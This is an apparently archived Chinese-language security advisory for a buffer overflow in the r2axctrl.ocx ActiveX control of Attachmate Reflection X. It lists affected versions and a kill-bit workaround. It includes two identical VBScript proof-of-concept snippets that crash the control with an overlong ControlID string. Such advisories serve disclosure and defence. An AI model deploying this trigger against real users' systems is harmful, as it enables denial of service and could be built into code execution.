发布日期：2009-05-18
更新日期：2010-05-19

受影响系统：

Attachmate Reflection X 14.0
Attachmate Reflection X 13.0
Attachmate Reflection Standard Suite 2008

描述：

---

BUGTRAQ  ID: 40243

Reflection X用于将Windows用户连接到UNIX、Linux、OpenVMS和Unixys系统上基于图形和字符应用程序。

Reflection X产品所安装的r2axctrl.ocx ActiveX控件没有正确地验证用户所提交的ControlID参数，用户受骗访问了恶意网页并传送了超长的字符串参数就可以触发缓冲区溢出，导致拒绝服务或执行任意代码。

<*来源：Rad L. Sneak
  
  链接：http://www.exploit-db.com/exploits/12650
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>  

PoC1  

<?XML version='1.0' standalone='yes' ?>  

<package><job id='DoneInVBS' debug='false' error='true'>  

<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />  

<script language='vbscript'>  

  

'Wscript.echo typename(target)  

  

'for debugging/custom prolog  

targetFile = "C:\Program Files\ReflectionsX\r2axctrl.ocx"  

prototype  = "Property Let ControlID As String"  

memberName = "ControlID"  

progid     = "R2AXCTRLLib.R2winCtrl"  

argCount   = 1  

  

arg1=String(4116, "A")  

  

target.ControlID = arg1  

  

</script></job></package></html>  

  


<html>  

PoC2  

<?XML version='1.0' standalone='yes' ?>  

<package><job id='DoneInVBS' debug='false' error='true'>  

<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />  

<script language='vbscript'>  

  

'Wscript.echo typename(target)  

  

'for debugging/custom prolog  

targetFile = "C:\Program Files\ReflectionsX\r2axctrl.ocx"  

prototype  = "Property Let ControlID As String"  

memberName = "ControlID"  

progid     = "R2AXCTRLLib.R2winCtrl"  

argCount   = 1  

  

arg1=String(4116, "A")  

  

target.ControlID = arg1  

  

</script></job></package></html>

建议：

---

临时解决方法：

* 为clsid 15B168B2-AD3C-11D1-A8D8-00A0C9200E61设置kill bit。

厂商补丁：

Attachmate
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.attachmate.com/

浏览次数：2686
严重程度：0（网友投票）